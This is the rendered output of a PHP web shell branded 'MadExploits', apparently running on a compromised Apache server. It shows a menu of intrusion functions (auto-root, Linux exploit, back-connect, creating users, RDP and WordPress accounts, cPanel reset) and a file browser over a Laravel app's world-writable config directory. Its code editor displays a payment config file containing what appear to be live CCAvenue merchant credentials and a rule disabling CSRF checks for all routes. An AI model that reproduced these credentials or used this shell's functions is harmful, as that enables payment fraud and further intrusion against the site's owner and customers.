Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
exclusive.maalgaadi /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
api.php
6.84
KB
-rwxrwxrwx
app.php
8.69
KB
-rwxrwxrwx
auth.php
3.16
KB
-rwxrwxrwx
broadcasting.php
1.37
KB
-rwxrwxrwx
cache.php
2.09
KB
-rwxrwxrwx
compile.php
983
B
-rwxrwxrwx
constants.php
678
B
-rwxrwxrwx
database.php
4.61
KB
-rwxrwxrwx
excel.php
23.13
KB
-rwxrwxrwx
fcm.php
508
B
-rwxrwxrwx
filesystems.php
2.49
KB
-rwxrwxrwx
indipay.php
2.55
KB
-rw-rw-r--
jwt.php
5.21
KB
-rwxrwxrwx
mail.php
4.24
KB
-rwxrwxrwx
push-notification.php
290
B
-rwxrwxrwx
queue.php
2.65
KB
-rwxrwxrwx
services.php
1.03
KB
-rwxrwxrwx
session.php
5.19
KB
-rwxrwxrwx
view.php
1017
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : indipay.php
<?php return [ /* |-------------------------------------------------------------------------- | Indipay Service Config |-------------------------------------------------------------------------- | gateway = CCAvenue / PayUMoney / EBS / Citrus / InstaMojo | view = File */ 'gateway' => 'InstaMojo', // Replace with the name of default gateway you want to use 'testMode' => false, // True for Testing the Gateway [For production false] 'ccavenue' => [ // CCAvenue Parameters 'merchantId' => env('INDIPAY_MERCHANT_ID', '153491'), 'accessCode' => env('INDIPAY_ACCESS_CODE', 'AVMH83GC76AB49HMBA'), 'workingKey' => env('INDIPAY_WORKING_KEY', '9AFDDC3BBC28DCCC9310F7AE377AE099'), // Should be route address for url() function 'redirectUrl' => env('INDIPAY_REDIRECT_URL', 'indipay/response'), 'cancelUrl' => env('INDIPAY_CANCEL_URL', 'indipay/response'), 'currency' => env('INDIPAY_CURRENCY', 'INR'), 'language' => env('INDIPAY_LANGUAGE', 'EN'), ], 'payumoney' => [ // PayUMoney Parameters 'merchantKey' => env('INDIPAY_MERCHANT_KEY', ''), 'salt' => env('INDIPAY_SALT', ''), 'workingKey' => env('INDIPAY_WORKING_KEY', ''), // Should be route address for url() function 'successUrl' => env('INDIPAY_SUCCESS_URL', 'indipay/response'), 'failureUrl' => env('INDIPAY_FAILURE_URL', 'indipay/response'), ], 'ebs' => [ // EBS Parameters 'account_id' => env('INDIPAY_MERCHANT_ID', ''), 'secretKey' => env('INDIPAY_WORKING_KEY', ''), // Should be route address for url() function 'return_url' => env('INDIPAY_SUCCESS_URL', 'indipay/response'), ], 'citrus' => [ // Citrus Parameters 'vanityUrl' => env('INDIPAY_CITRUS_VANITY_URL', ''), 'secretKey' => env('INDIPAY_WORKING_KEY', ''), // Should be route address for url() function 'returnUrl' => env('INDIPAY_SUCCESS_URL', 'indipay/response'), 'notifyUrl' => env('INDIPAY_SUCCESS_URL', 'indipay/response'), ], 'instamojo' => [ 'api_key' => env('INSTAMOJO_API_KEY',''), 'auth_token' => env('INSTAMOJO_AUTH_TOKEN',''), 'redirectUrl' => env('INDIPAY_REDIRECT_URL', 'indipay/response'), ], // Add your response link here. In Laravel 5.2 you may use the api middleware instead of this. 'remove_csrf_check' => [ '/*' ], ];
Close